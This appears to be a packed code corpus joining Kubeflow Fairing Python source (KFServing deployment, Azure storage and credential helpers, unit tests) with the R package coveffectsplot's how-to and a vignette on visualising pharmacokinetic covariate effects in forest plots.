XGBoost and ScikitLearn etc.
:param default_model_uri: URI pointing to Saved Model assets for default service.
:param canary_model_uri: URI pointing to Saved Model assets for canary service.
:param canary_traffic_percent: The amount of traffic to sent to the canary, defaults to 0.
:param namespace: The k8s namespace where the kfservice will be deployed.
:param labels: Labels for the kfservice, separate with commas if have more than one.
:param annotations: Annotations for the kfservice,
separate with commas if have more than one.
:param custom_default_spec: A flexible custom default specification for arbitrary customer
provided containers.
:param custom_canary_spec: A flexible custom canary specification for arbitrary customer
provided containers.
:param stream_log: Whether to stream the log after the kfservice starts, defaults to True.
:param cleanup: Whether to delete the kfservice after deployment, defaults to False.
"""
self.framework = framework
self.default_model_uri = default_model_uri
self.canary_model_uri = canary_model_uri
self.canary_traffic_percent = canary_traffic_percent
self.annotations = annotations
self.set_labels(labels)
self.cleanup = cleanup
self.custom_default_spec = custom_default_spec
self.custom_canary_spec = custom_canary_spec
self.stream_log = stream_log
self.backend = KubeManager()
if namespace is None:
self.namespace = utils.get_default_target_namespace()
else:
self.namespace = namespace
def set_labels(self, labels):
"""set label for deployed prediction
:param labels: dictionary of labels {label_name:label_value}
"""
self.fairing_id = str(uuid.uuid1())
self.labels = {'fairing-id': self.fairing_id}
if labels:
self.labels.update(labels)
def deploy(self, template_spec): # pylint:disable=arguments-differ,unused-argument
"""deploy kfserving endpoint
:param template_spec: template spec
"""
self.kfservice = self.generate_kfservice()
self.created_kfserving = self.backend.create_kfserving(
self.namespace, self.kfservice)
if self.stream_log:
self.get_logs()
kfservice_name = self.created_kfserving['metadata']['name']
logger.warning(
"Deployed the kfservice {} successfully.".format(kfservice_name))
if self.cleanup:
logger.warning("Cleaning up kfservice {}...".format(kfservice_name))
self.backend.delete_kfserving(kfservice_name, self.namespace)
return kfservice_name
def generate_kfservice(self):
""" generate kfserving template"""
spec = {}
spec['default'] = {}
if self.framework != 'custom':
if self.default_model_uri is not None:
spec['default'][self.framework] = {}
spec['default'][self.framework]['modelUri'] = self.default_model_uri
else:
raise RuntimeError(
"The default_model_uri must be defined if the framework is not custom.")
else:
if self.custom_default_spec is not None:
# TBD @jinchi Need to validate the custom_default_spec before executing.
spec['default'][self.framework] = self.custom_default_spec
else:
raise RuntimeError(
"The custom_default_spec must be defined if the framework is custom.")
if self.framework != 'custom':
if self.canary_model_uri is not None:
spec['canary'] = {}
spec['canary'][self.framework] = {}
spec['canary'][self.framework]['modelUri'] = self.canary_model_uri
spec['canaryTrafficPercent'] = self.canary_traffic_percent
else:
if self.custom_canary_spec is not None:
spec['canary'] = {}
spec['canary'][self.framework] = self.custom_canary_spec
spec['canaryTrafficPercent'] = self.canary_traffic_percent
metadata = k8s_client.V1ObjectMeta(
generate_name=constants.KFSERVING_DEFAULT_NAME,
namespace=self.namespace,
labels=self.labels,
annotations=self.annotations
)
kfservice = {}
kfservice['kind'] = constants.KFSERVING_KIND
kfservice['apiVersion'] = constants.KFSERVING_GROUP + \
'/' + constants.KFSERVING_VERSION
kfservice['metadata'] = metadata
kfservice['spec'] = spec
return kfservice
def get_logs(self):
""" get log from prediction pod"""
name = self.created_kfserving['metadata']['name']
namespace = self.created_kfserving['metadata']['namespace']
self.backend.log(name, namespace, self.labels,
container=constants.KFSERVING_CONTAINER_NAME, follow=False)
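# Example usage (a minimal sketch; the model URI is hypothetical):
#
#   kfserving = KFServing(framework='tensorflow',
#                         default_model_uri='gs://my-bucket/models/flowers',
#                         namespace='kubeflow', stream_log=False)
#   kfservice_name = kfserving.deploy(None)  # template_spec is unused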
<file_sep>/tests/unit/cloud/test_docker.py
from kubeflow.fairing.cloud.docker import get_docker_secret
from kubeflow.fairing.constants import constants
import json
import os
def test_docker_secret_spec():
os.environ["DOCKER_CONFIG"] = "/tmp"
config_dir = os.environ.get('DOCKER_CONFIG')
config_file_name = 'config.json'
config_file = os.path.join(config_dir, config_file_name)
with open(config_file, 'w+') as f:
json.dump({'config': "config"}, f)
docker_secret = get_docker_secret()
assert docker_secret.metadata.name == constants.DOCKER_CREDS_SECRET_NAME
os.remove(config_file)
<file_sep>/kubeflow/fairing/__init__.py
import os
from kubeflow.fairing.ml_tasks.tasks import TrainJob, PredictionEndpoint
if os.getenv('FAIRING_RUNTIME', None) is not None:
from kubeflow.fairing.runtime_config import config
else:
from kubeflow.fairing.config import config
name = "fairing"
__version__ = "0.6.0"
<file_sep>/tests/unit/cloud/test_azure.py
import base64
import uuid
from unittest.mock import patch
from kubernetes import client
from azure.common.credentials import ServicePrincipalCredentials
from kubeflow.fairing.kubernetes.manager import KubeManager
from kubeflow.fairing.cloud.azure import get_azure_credentials
TEST_CLIENT_ID = str(uuid.uuid4())
TEST_CLIENT_SECRET = str(uuid.uuid4())
TEST_TENANT_ID = str(uuid.uuid4())
TEST_SUBSCRIPTION_ID = str(uuid.uuid4())
def encode_value(value):
return base64.b64encode(value.encode())
class MockSecret(object):
def __init__(self):
self.data = {
'AZ_CLIENT_ID': encode_value(TEST_CLIENT_ID),
'AZ_CLIENT_SECRET': encode_value(TEST_CLIENT_SECRET),
'AZ_TENANT_ID': encode_value(TEST_TENANT_ID),
'AZ_SUBSCRIPTION_ID': encode_value(TEST_SUBSCRIPTION_ID)
}
# Test that credentials are parsed properly from the Kubernetes secrets.
@patch.object(KubeManager, 'secret_exists')
@patch.object(KubeManager, '__init__')
@patch.object(client.CoreV1Api, 'read_namespaced_secret')
@patch.object(ServicePrincipalCredentials, '__init__')
def test_get_azure_credentials(credentials_init_mock,
read_namespaced_secret_mock,
manager_init_mock,
secret_exists_mock):
secret_exists_mock.return_value = True
manager_init_mock.return_value = None
read_namespaced_secret_mock.return_value = MockSecret()
credentials_init_mock.return_value = None
credentials, subscription_id = get_azure_credentials('kubeflow')
credentials_init_mock.assert_called_with(
client_id=TEST_CLIENT_ID,
secret=TEST_CLIENT_SECRET,
tenant=TEST_TENANT_ID
)
assert isinstance(credentials, ServicePrincipalCredentials)
assert subscription_id == TEST_SUBSCRIPTION_ID
<file_sep>/kubeflow/fairing/cloud/azure.py
import logging
import base64
import tarfile
from pathlib import Path
from shutil import rmtree
from azure.common.credentials import ServicePrincipalCredentials
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.storage.models import StorageAccountCreateParameters
from azure.mgmt.storage.models import Sku
from azure.mgmt.storage.models import SkuName
from azure.mgmt.storage.models import Kind
from azure.storage.file import FileService
from kubernetes import client
from kubeflow.fairing.constants import constants
from kubeflow.fairing.kubernetes.manager import KubeManager
logger = logging.getLogger(__name__)
# Helper class to upload files to Azure Files
class AzureFileUploader(object):
def __init__(self, namespace, credentials=None, subscription_id=None):
if not credentials or not subscription_id:
credentials, subscription_id = get_azure_credentials(namespace)
self.storage_client = StorageManagementClient(credentials, subscription_id)
# Upload the files and dirs in a tar.gz file to a dir in a shared folder in Azure Files
def upload_to_share(self,
region,
resource_group_name,
storage_account_name,
share_name,
dir_name,
tar_gz_file_to_upload):
logging.info(
"Uploading contents of '{}' to 'https://{}.file.core.windows.net/{}/{}'"
.format(tar_gz_file_to_upload, storage_account_name, share_name, dir_name)
)
self.create_storage_account_if_not_exists(region, resource_group_name, storage_account_name)
storage_account_name, storage_key = self.get_storage_credentials(
resource_group_name, storage_account_name
)
share_service = FileService(account_name=storage_account_name, account_key=storage_key)
self.create_share_if_not_exists(share_service, share_name)
share_service.create_directory(share_name, dir_name)
self.upload_tar_gz_contents(share_service, share_name, dir_name, tar_gz_file_to_upload)
return storage_account_name, storage_key
def create_storage_account_if_not_exists(self, region, resource_group_name,
storage_account_name):
"""Creates the storage account if it does not exist.
In either case, returns the StorageAccount class that matches the given arguments."""
storage_accounts = (
self.storage_client.storage_accounts
.list_by_resource_group(resource_group_name)
)
storage_account = next(
filter(lambda storage_account:
storage_account.name == storage_account_name,
storage_accounts),
None
)
if storage_account:
return storage_account
logging.info(
"Creating Azure Storage account '{}' in Resource Group '{}'"
.format(storage_account_name, resource_group_name)
)
storage_async_operation = self.storage_client.storage_accounts.create(
resource_group_name,
storage_account_name,
StorageAccountCreateParameters(
sku=Sku(name=SkuName.standard_ragrs),
kind=Kind.storage,
location=region
)
)
return storage_async_operation.result()
def get_storage_credentials(self, resource_group_name, storage_account_name):
storage_keys = (
self.storage_client.storage_accounts
.list_keys(resource_group_name, storage_account_name)
)
storage_keys = {v.key_name: v.value for v in storage_keys.keys}
return storage_account_name, storage_keys['key1']
def create_share_if_not_exists(self, share_service, share_name):
shares = share_service.list_shares()
share = next(filter(lambda share: share.name == share_name, shares), None)
if share is None:
share_service.create_share(share_name)
def upload_tar_gz_contents(self, share_service, share_name, dir_name, tar_gz_file):
local_dir = Path('{}_contents'.format(tar_gz_file))
cloud_dir = Path(dir_name)
self.uncompress_tar_gz_file(tar_gz_file, local_dir)
for path in local_dir.glob('**/*'):
local_path = Path(path)
cloud_relative_path = cloud_dir / path.relative_to(local_dir)
if local_path.is_dir():
share_service.create_directory(share_name, cloud_relative_path)
else:
share_service.create_file_from_path(
share_name, cloud_relative_path.parents[0],
cloud_relative_path.name, local_path
)
self.delete_uncompressed_files(local_dir)
def uncompress_tar_gz_file(self, tar_gz_file, target_dir):
tar = tarfile.open(tar_gz_file, 'r:gz')
tar.extractall(path=target_dir)
tar.close()
def delete_uncompressed_files(self, target_dir):
rmtree(target_dir)
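# Example usage (a minimal sketch; the names and paths are hypothetical):
#
#   uploader = AzureFileUploader("kubeflow")
#   account, key = uploader.upload_to_share(
#       region="NorthEurope",
#       resource_group_name="fairing",
#       storage_account_name="fairingabc123",
#       share_name="fairing-builds",
#       dir_name="build_1A2B3C4D",
#       tar_gz_file_to_upload="/tmp/fairing_context.tar.gz")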
# Get credentials for a service principal which has permissions to
# create or access the storage account for Azure Files
def get_azure_credentials(namespace):
secret_name = constants.AZURE_CREDS_SECRET_NAME
if not KubeManager().secret_exists(secret_name, namespace):
raise Exception("Secret '{}' not found in namespace '{}'".format(secret_name, namespace))
v1 = client.CoreV1Api()
secret = v1.read_namespaced_secret(secret_name, namespace)
sp_credentials = ServicePrincipalCredentials(
client_id=get_plain_secret_value(secret.data, 'AZ_CLIENT_ID'),
secret=get_plain_secret_value(secret.data, 'AZ_CLIENT_SECRET'),
tenant=get_plain_secret_value(secret.data, 'AZ_TENANT_ID')
)
subscription_id = get_plain_secret_value(secret.data, 'AZ_SUBSCRIPTION_ID')
return sp_credentials, subscription_id
# Decode plain text value of a secret of given key and raise an exception if the key is not found
def get_plain_secret_value(secret_data, key):
if key not in secret_data:
raise Exception("Secret with key '{}' not found".format(key))
secret_base64 = secret_data[key]
return base64.b64decode(secret_base64).decode('utf-8')
# Create a secret with the credentials to access the storage account for Azure Files
def create_storage_creds_secret(namespace, context_hash, storage_account_name, storage_key):
secret_name = constants.AZURE_STORAGE_CREDS_SECRET_NAME_PREFIX + context_hash.lower()
logging.info(
"Creating secret '{}' in namespace '{}'"
.format(secret_name, namespace)
)
secret = client.V1Secret(
metadata=client.V1ObjectMeta(name=secret_name),
string_data={
'azurestorageaccountname': storage_account_name,
'azurestorageaccountkey': storage_key
})
v1 = client.CoreV1Api()
v1.create_namespaced_secret(namespace, secret)
# Delete the secret with the credentials to access the storage account for Azure Files
def delete_storage_creds_secret(namespace, context_hash):
secret_name = constants.AZURE_STORAGE_CREDS_SECRET_NAME_PREFIX + context_hash.lower()
logging.info(
"Deleting secret '{}' from namespace '{}'"
.format(secret_name, namespace)
)
v1 = client.CoreV1Api()
v1.delete_namespaced_secret(secret_name, namespace, body=None)
# Verify that we are working with an Azure Container Registry
def is_acr_registry(registry):
return registry.endswith('.azurecr.io')
# Mount Docker config so the pod can access Azure Container Registry
def add_acr_config(kube_manager, pod_spec, namespace):
secret_name = constants.AZURE_ACR_CREDS_SECRET_NAME
if not kube_manager.secret_exists(secret_name, namespace):
raise Exception("Secret '{}' not found in namespace '{}'".format(secret_name, namespace))
volume_mount = client.V1VolumeMount(
name='acr-config', mount_path='/kaniko/.docker/', read_only=True
)
if pod_spec.containers[0].volume_mounts:
pod_spec.containers[0].volume_mounts.append(volume_mount)
else:
pod_spec.containers[0].volume_mounts = [volume_mount]
items = [client.V1KeyToPath(key='.dockerconfigjson', path='config.json')]
volume = client.V1Volume(
name='acr-config',
secret=client.V1SecretVolumeSource(secret_name=secret_name, items=items)
)
if pod_spec.volumes:
pod_spec.volumes.append(volume)
else:
pod_spec.volumes = [volume]
# Mount Azure Files shared folder so the pod can access its files with a local path
def add_azure_files(kube_manager, pod_spec, namespace):
context_hash = pod_spec.containers[0].args[1].split(':')[-1]
secret_name = constants.AZURE_STORAGE_CREDS_SECRET_NAME_PREFIX + context_hash.lower()
if not kube_manager.secret_exists(secret_name, namespace):
raise Exception("Secret '{}' not found in namespace '{}'".format(secret_name, namespace))
volume_mount = client.V1VolumeMount(
name='azure-files', mount_path='/mnt/azure/', read_only=True
)
if pod_spec.containers[0].volume_mounts:
pod_spec.containers[0].volume_mounts.append(volume_mount)
else:
pod_spec.containers[0].volume_mounts = [volume_mount]
volume = client.V1Volume(
name='azure-files',
azure_file=client.V1AzureFileVolumeSource(
secret_name=secret_name, share_name=constants.AZURE_FILES_SHARED_FOLDER
)
)
if pod_spec.volumes:
pod_spec.volumes.append(volume)
else:
pod_spec.volumes = [volume]
<file_sep>/kubeflow/fairing/utils.py
import os
import zlib
import uuid
def get_image(repository, name):
"""Get the full image name by integrating repository and image name.
:param repository: The name of repository
:param name: The short image name
:returns: str: Full image name, format: repo/name.
"""
return "{repo}/{name}".format(
repo=repository,
name=name
)
def is_running_in_k8s():
"""Check if running in the kubernetes cluster."""
return os.path.isdir('/var/run/secrets/kubernetes.io/')
def get_current_k8s_namespace():
"""Get the current namespace of kubernetes."""
with open('/var/run/secrets/kubernetes.io/serviceaccount/namespace', 'r') as f:
return f.readline()
def get_default_target_namespace():
"""Get the default target namespace, if running in the kubernetes cluster,
will be current namespace, Otherwiase, will be "default".
"""
if not is_running_in_k8s():
return 'default'
return get_current_k8s_namespace()
def crc(file_name):
"""Compute a running Cyclic Redundancy Check checksum.
:param file_name: The name of the file to checksum.
"""
prev = 0
for eachLine in open(file_name, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
def random_tag():
"""Get a random tag."""
return str(uuid.uuid4()).split('-')[0]
<repo_name>smouksassi/interactiveforestplot<file_sep>/inst/shiny/text/howto.md
1. Upload your data file in csv format. R default options for `read.csv` will apply
except for missing values where both (NA) and dot (.) are treated as missing.
`read.csv("yourdata.csv", na.strings = c("NA", "."))`
2. The uploaded data will be mapped automatically; it is required that your data contain the following column names (see the example below):
+ paramname: Parameter on which the effects are shown e.g. CL, Cmax, AUC etc.
+ covname: Covariate name that the effects belong to e.g. Weight, SEX, Dose etc.
+ label: Covariate value for which the effects are shown e.g. 50 kg, 50 kg/90 kg (here the reference value is contained in the label).
+ mid: Middle value for the effects usually the median from the uncertainty distribution.
+ lower: Lower value for the effects usually the 2.5% or 5% from the uncertainty distribution.
+ upper: Upper value for the effects usually the 97.5% or 95% from the uncertainty distribution.
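A minimal sketch of a valid input built in R before saving it as a csv (the numbers below are invented for illustration):

```
# hypothetical effects of Weight on CL, relative to a 70 kg reference
plotdata <- data.frame(
  paramname = "CL",
  covname   = "Weight",
  label     = c("50 kg", "90 kg"),
  mid       = c(0.78, 1.21),
  lower     = c(0.70, 1.09),
  upper     = c(0.87, 1.35)
)
write.csv(plotdata, "yourdata.csv", row.names = FALSE)
```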
Refer to the repo readme file for additional info:
<a href="https://github.com/smouksassi/coveffectsplot" target="_blank">Click Here to go to the github repo.</a>
The package vignettes include an introduction and multiple detailed examples:
<a href="https://cran.r-project.org/web/packages/coveffectsplot/vignettes/introduction_to_coveffectsplot.html">Introduction to coveffectsplot.</a>
<a href="https://cran.r-project.org/web/packages/coveffectsplot/vignettes/PK_Example.html">PK example</a>
<a href="https://cran.r-project.org/web/packages/coveffectsplot/vignettes/PKPD_Example.html">PK PD example</a>
<a href="https://cran.r-project.org/web/packages/coveffectsplot/vignettes/Exposure_Response_Example.html">Exposure Response</a>
Contact me @ <EMAIL> for feedback/bugs/features/pull requests!
*<NAME> 2020*
<file_sep>/vignettes/introduction_to_coveffectsplot.Rmd
---
title: "Introduction to `coveffectsplot`"
author: "<NAME>"
date: "`r Sys.Date()`"
output:
rmarkdown::html_vignette:
toc: true
vignette: >
%\VignetteIndexEntry{Introduction to coveffectsplot}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
```{r setup, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
warning =FALSE,
message =FALSE,
comment = "#>",
dev.args = list(png = list(type = "cairo"))
)
library(coveffectsplot)
library(ggplot2)
library(ggridges)
suppressPackageStartupMessages( library(dplyr) )
nuncertainty <- 10000
nbsvsubjects <- 100000
```
The use of forest plots to summarize the impact of various intrinsic and extrinsic factors on the pharmacokinetics (PK) of drugs is becoming a standard practice and a key part of submission packages to the FDA. The forest plot format makes it easier for clinicians to quickly find and interpret the information they need.^[Essential pharmacokinetic information for drug dosage decisions: a concise visual presentation in the drug label. Clin Pharmacol Ther. 2011 Sep;90(3):471-4.]
## Motivation
Traditionally, a paragraph describing the various doses in various groups is part of the official drug label, and often a table is provided. The advantages of tables versus graphs have been previously discussed and each has its own merits. While web-based interactive graphics allow on-demand mouse hovering to show the graph numbers, this is not possible on a printed sheet of paper or on a static PDF as required for a drug label. As such, combining a graphic representation of the data with a side table provides the best of both worlds and gives the clinician an efficient way to interpret the data.
## Background on a Fictitious Drug
Let us assume that we have a drug following a first-order absorption one-compartment PK model with parameters absorption constant (Ka), Clearance (CL) and Volume of distribution (V). Usually, a nonlinear mixed effects model is fitted to the PK data and covariates covering intrinsic and extrinsic factors are tested on the various parameters. For simplicity, let us assume that the covariate modeling did not add any covariate on Ka and V and provided the following model for CL:
$$CL = {POPCL} \times \left( \frac { \color{blue}{Weight}} {70}\right)^{dWTdCL}\times \left( dSexdCL\right)^{\left( \color{blue}{Sex}== 1 \right)}\times \exp(\eta_{CL})$$
The above equation shows that we have two covariates on CL: one is Weight (kg), a continuous variable with a reference value of 70 (kg), influencing CL through a power model with coefficient dWTdCL. The second is Sex, an indicator variable taking the value 0 (Woman, used as the reference category) or 1 (Man), influencing CL with a coefficient dSexdCL. The last term denotes the individual deviations from the population (random effects), which assumes that CL in the population is log normally distributed. The same model may be more familiar to statisticians if re-written in log-linear additive form:
$$log(CL) = {log(POPCL)} + dWTdCL\times log\left(\frac { \color{blue}{Weight}} {70}\right)+ \ log(dSexdCL)\times\left(\color{blue}{Sex}== 1 \right) +\eta_{CL}$$
where the individual level random effect describes the between subject variability (BSV):
$$\eta_{CL}\sim \mathcal{N}(0,\,\omega_{CL}^{2})$$
The modeling output would give you the value of the fixed effects parameters (POPCL, dWTdCL and dSexdCL), the variance covariance matrix of the random effects, as well as the associated uncertainty from the estimated asymptotic variance covariance matrix of the various estimated parameters. Alternatively, the uncertainty can also be obtained using a nonparametric bootstrap resampling of the individuals. Oftentimes, the uncertainty is reported as a standard error or relative standard error (%). If we are interested in reporting the standard error of CL in Men, there are several ways to compute it: 1) error propagation using the delta method; 2) simulation from the variance covariance matrix; 3) using the bootstrap distribution.
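As a quick illustration of the second approach, a minimal sketch (using the point estimates and 15% relative standard errors assumed later in this vignette, and ignoring parameter correlations for simplicity) could be:

```r
library(MASS)
# draw parameter vectors from the asymptotic multivariate normal distribution
# (diagonal Sigma, i.e. assuming no correlation between the estimates)
sims <- MASS::mvrnorm(n = 10000,
                      mu = c(POPCL = 10, dSexdCL = 1.5),
                      Sigma = diag(c((10 * 0.15)^2, (1.5 * 0.15)^2)))
clmen <- sims[, "POPCL"] * sims[, "dSexdCL"]  # CL in Men at the reference weight
sd(clmen)                                     # simulation-based standard error
quantile(clmen, c(0.05, 0.5, 0.95))           # or report percentiles directly
```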
The observed distribution of the covariates Weight and Sex in the studied population is important because, to compute the covariate effects, we need to choose values for all covariates included in the model. It is desirable to provide sensible values that give a good sense of where most of the patients are. A common practice is to report the effects of the 75th percentile to the 25th percentile, which will cover 50% of the population; some would also want to cover 90% of the population (5th to the 95th percentiles). Of note is that we need to cover enough of the covariate range and steps (e.g. show effects at the 5th, 25th, 50th, 75th and 95th percentiles) to illustrate a nonlinear relationship like the power model.
Alternatively, we might be interested in computing effects for a clinically meaningful difference, e.g. 20 kg, and then we report effects at 50, 70 and 90 kg. Some clinical covariates like eGFR have predefined cutoffs that we want to cover.
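A short sketch of extracting such percentiles from observed covariate data (here a made-up weight vector stands in for the real distribution):

```r
set.seed(1)
weights <- rnorm(1000, mean = 70, sd = 20)  # stand-in for the observed weights
round(quantile(weights, probs = c(0.05, 0.25, 0.5, 0.75, 0.95)), 0)
# the resulting percentiles can serve as the covariate values shown in the plot
```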
If the assumption of varying one covariate at a time does not hold we recommend the use of a realistic distribution of correlated covariates (simulated or real).
Finally, since the BSV cannot be controlled for, showing the distribution of the BSV is important to contrast and compare with the estimated covariate related effects as this will allow us to understand where a random subject given a known set of covariates could possibly belong. We also suggest that precomputing BSV ranges based on percentiles of the BSV distribution is more helpful than letting the user guess the ranges from visual inspection.
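A sketch of precomputing such BSV ranges from a log-normal between subject variance (here assuming the $\omega^2$ = 0.09 used below):

```r
set.seed(1)
bsv <- exp(rnorm(1e5, mean = 0, sd = sqrt(0.09)))  # standardized individual multipliers
round(quantile(bsv, probs = c(0.05, 0.25, 0.75, 0.95)), 2)
# the 25th-75th range covers 50% of patients; the 5th-95th range covers 90%
```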
## Simulating Data and Outputs from a Modeling Exercise
We will assume that the model fit had estimated parameters with relative standard errors of 15%. For this vignette, a simulation from a multivariate normal distribution with n = 10000 was used. The first five rows are shown in the table below. The assumed mean values for POPCL, dWTdCL and dSexdCL were 10, 0.75 and 1.5 respectively.
For simplicity, we will also assume that there were equal numbers of Sex = 1 (Man) and Sex = 0 (Woman) and that men and women had mean weights of 75 and 65 kg and the same standard deviation of 20 kg. Note that unless we explicitly code the simulation in a way that prevents negative weights (e.g. using a log normal distribution) we will end up simulating some negative ones.
```{r, echo=TRUE, results='asis',fig.align = "center",fig.width = 6}
set.seed(657687)
df <- data.frame(
MASS::mvrnorm(n = nuncertainty,
mu = c(10,0.75,1.5),
Sigma=matrix(c((10*0.15)^2,
0.001,0.001,0.001,(0.75*0.15)^2,
0.001,0.001,0.001,(1.5*0.15)^2),3,3,byrow = TRUE)
))
names(df) <- c("POPCL","dWTdCL","dSexdCL")
knitr::kable(head(round(df,2),5))
```
```{r, echo=FALSE, results='asis',fig.align = "center",fig.width = 6}
dflong <- tidyr::gather(df)
ggplot2::ggplot(dflong,ggplot2::aes(x=value,fill=key))+
ggplot2::geom_density(alpha=0.2)+
ggplot2::facet_wrap(~key,scales="free",ncol=1)+
ggplot2::labs(fill="",x="Uncertainty Distribution (RSE 15%) of the Parameters")+
ggplot2::theme(legend.position = "right",legend.background =
ggplot2::element_rect(fill="transparent"),
axis.ticks.y = element_blank(),axis.text.y =element_blank())+
ggplot2::guides(fill=ggplot2::guide_legend(reverse = FALSE))
set.seed(657687)
dfcov<- data.frame(
MASS::mvrnorm(n=nbsvsubjects,
mu =c(65,75),
Sigma=matrix(c(20^2,0.01,0.01,20^2),2,2,byrow = TRUE)
))
names(dfcov)<- c("WTWOMAN","WTMAN")
dfcovlong <- tidyr::gather(dfcov)
ggplot2::ggplot(dfcovlong,ggplot2::aes(x=value,fill=key))+
ggplot2::geom_density(alpha=0.2)+
ggplot2::labs(fill="",x="Weight (kg)")+
ggplot2::theme(legend.position = "right",legend.background =
ggplot2::element_rect(fill="transparent"),axis.ticks.y = element_blank(),axis.text.y =element_blank())+
ggplot2::guides(fill=ggplot2::guide_legend(reverse = FALSE))
dfcovlongquantile<- as.data.frame(
round(quantile(dfcovlong$value,probs=c(0.01,0.05,0.25,0.5,0.75,0.95,0.99)),0)
)
names(dfcovlongquantile)<- "Weightquantilevalue"
dfcovlongquantile$quantile<- rownames(dfcovlongquantile)
dfcovlongquantiletable<- t(dfcovlongquantile)
knitr::kable(dfcovlongquantiletable[1,,drop=FALSE],row.names=FALSE)
```
The model had a between subject variability variance on CL of $\omega_{CL}^{2}$ = 0.09, which translates to an apparent CV of sqrt(exp(0.09) - 1) = 0.3069. A common way to report this BSV is to say we have 30.7% BSV. But what does this really mean in practical terms? What are the chances that a patient with known covariate values will have a very low or very high CL warranting dose changes?
A useful metric can be to compute the bounds where, say, 50% and 90% of the patients will be located, using simple quantile functions on simulated distributions. For the 30.7% BSV case, we compute that 50% of the patients will be within the 0.82 to 1.23 interval (dark red area) while 90% of the patients will be within the 0.61 to 1.63 interval (lighter red area). A table showing the various quantiles is also shown. For asymmetrical distributions we can also use highest density intervals instead of percentiles, but this is not shown here.
```{r, echo=TRUE,fig.align = "center",fig.width = 6}
set.seed(546789)
CLBSVdistribution <- data.frame(CL= 10*exp(rnorm(nbsvsubjects,0,sd=0.09^0.5)))
CLBSVdistribution$CLBSV<- CLBSVdistribution$CL/10
```
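The interval bounds quoted above can be precomputed directly from this simulated distribution, e.g.:

```r
round(quantile(CLBSVdistribution$CLBSV, probs = c(0.05, 0.25, 0.75, 0.95)), 2)
```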
```{r, echo=FALSE,fig.align = "center",fig.width = 6 ,fig.height=4}
dfbsv<- as.data.frame(
round( quantile(CLBSVdistribution$CLBSV,probs=c(0.01,0.05,0.25,0.5,0.75,0.95,0.99)),2))
names(dfbsv)<- "BSVquantilevalue"
dfbsv$quantile<- rownames(dfbsv)
CLBSVdistribution$paramname<- "CL"
bsvplot<- ggplot(CLBSVdistribution, aes(
x = CLBSV,
y = paramname,
fill = factor(..quantile..),
height = ..ndensity..)) +
stat_density_ridges(
geom="density_ridges_gradient", calc_ecdf=TRUE,
quantile_lines=TRUE, rel_min_height=0.001, scale=0.9,
quantiles=c(0.05, 0.25, 0.5, 0.75, 0.95)) +
scale_fill_manual(
name="BSV Ranges",
values=c("white", "#FF000050", "#FF0000A0", "#FF0000A0", "#FF000050", "white"),
labels = c("(0, 0.05]", "(0.05, 0.25]",
"(0.25, 0.5]", "(0.5, 0.75]",
"(0.75, 0.95]", "(0.95, 1]")) +
theme_bw(base_size = 16) +
theme(
legend.position = "right",
axis.text.y = element_blank(),
axis.ticks.y = element_blank(),
axis.title.y = element_blank(),
axis.text.x=ggplot2::element_text(size=12),
axis.title.x=ggplot2::element_text(size=14)) +
scale_x_continuous(breaks=c(0.61,0.82,1,1.22,1.63))+
coord_cartesian(expand=FALSE,xlim = c(0.49,2.01))+
ggplot2::labs(x="Standardized Individual Clearances with BSV",
title="Illustrating 30.7% BSV")
bsvplot
dfbsvtable<- t(dfbsv)
knitr::kable(dfbsvtable[1,,drop=FALSE],row.names=FALSE)
#bayestestR::hdi(CLBSVdistribution$CLBSV,ci = c(.50, .90))
#0.55, 0.74, 1 , 1.12, 1.53
```
```{r,include=FALSE}
# bsvplot
# ggsave("Figure_2.png", device="png",
# type="cairo-png",width= 7, height = 5,dpi=300)
```
## Visualizing Covariate Effects with Distributions
* First, we will divide the POPCL uncertainty distribution by its median to standardize it. This will make everything relative to the reference where all covariates are held at the reference value(s), here Sex = 0 and Weight = 70 kg.
* Second, we will compute the effects of Weight = 50 kg and 90 kg as compared to the 70 kg reference.
We keep dSexdCL as is; it represents the effect of Sex = 1 when weight is held at its reference value of 70 kg.
* Third, we optionally compute the effects for combinations of covariates of interest e.g. Weight = 90 kg and Sex = 1. A clinical relevance area e.g. between 0.8 and 1.25 of the reference value is shown since this is often regarded as the zone of PK equivalence. Usually, a covariate needs to have effects driving PK exposures outside of this zone to trigger actions requiring dose changes.
* Finally, we will make a plot that compares the magnitude of uncertainty, covariate distribution and between subject variability effects.
```{r,fig.width= 7}
dfeffects <- df
dfeffects$REF <- dfeffects$POPCL/ median(dfeffects$POPCL)
dfeffects$SEX_FEMALE_WT_50 <- dfeffects$REF*(50/70)^dfeffects$dWTdCL
dfeffects$SEX_FEMALE_WT_90 <- dfeffects$REF*(90/70)^dfeffects$dWTdCL
dfeffects$SEX_Male_WT_70 <- dfeffects$dSexdCL
dfeffects$SEX_Male_WT_90 <- dfeffects$dSexdCL*dfeffects$REF*(90/70)^dfeffects$dWTdCL
dfeffects$BSV<- sample(CLBSVdistribution$CLBSV, nuncertainty)
dfeffects<- dfeffects[,c("SEX_FEMALE_WT_50",
"SEX_FEMALE_WT_90",
"SEX_Male_WT_70",
"SEX_Male_WT_90",
"REF",
"BSV")]
dflong <- tidyr::gather(dfeffects)
ggplot2::ggplot(dflong,ggplot2::aes(x=value,y=key,fill=factor(..quantile..)))+
ggridges::stat_density_ridges(
geom = "density_ridges_gradient", calc_ecdf = TRUE,
quantile_lines = TRUE, rel_min_height = 0.01,
quantiles = c(0.05,0.5, 0.95)) +
ggplot2::scale_fill_manual(
name = "Probability", values = c("#FF0000A0", "white","white", "#0000FFA0"),
labels = c("(0, 0.05]", "(0.05, 0.5]","(0.5, 0.95]", "(0.95, 1]")
)+
ggplot2::annotate(
"rect",
xmin = 0.8,
xmax = 1.25,
ymin = -Inf,
ymax = Inf,
fill = "gray",alpha=0.4
)+
ggplot2::geom_vline(
ggplot2::aes(xintercept = 1),
size = 1
)+
ggplot2::theme_bw()+
ggplot2::labs(x="Effects Relative to parameter reference value",y="")
```
*Here we overlay the various sources of variability to compare them head to head:*
```{r,fig.width= 7}
ggplot2::ggplot(dfeffects)+
ggplot2::geom_density(ggplot2::aes(x=REF,y=..scaled..,col="a.Uncertainty\nRSE=15%"))+
ggplot2::geom_density(data=dfcovlong,
ggplot2::aes(x=(value/70)^0.75 ,
y=..scaled..,col="b.Weight\nMean=70 kg, sd=20 kg"))+
ggplot2::geom_density(data=CLBSVdistribution ,ggplot2::aes(x=CLBSV,
y=..scaled..,col="c.Between subject variability\nCV=30%"))+
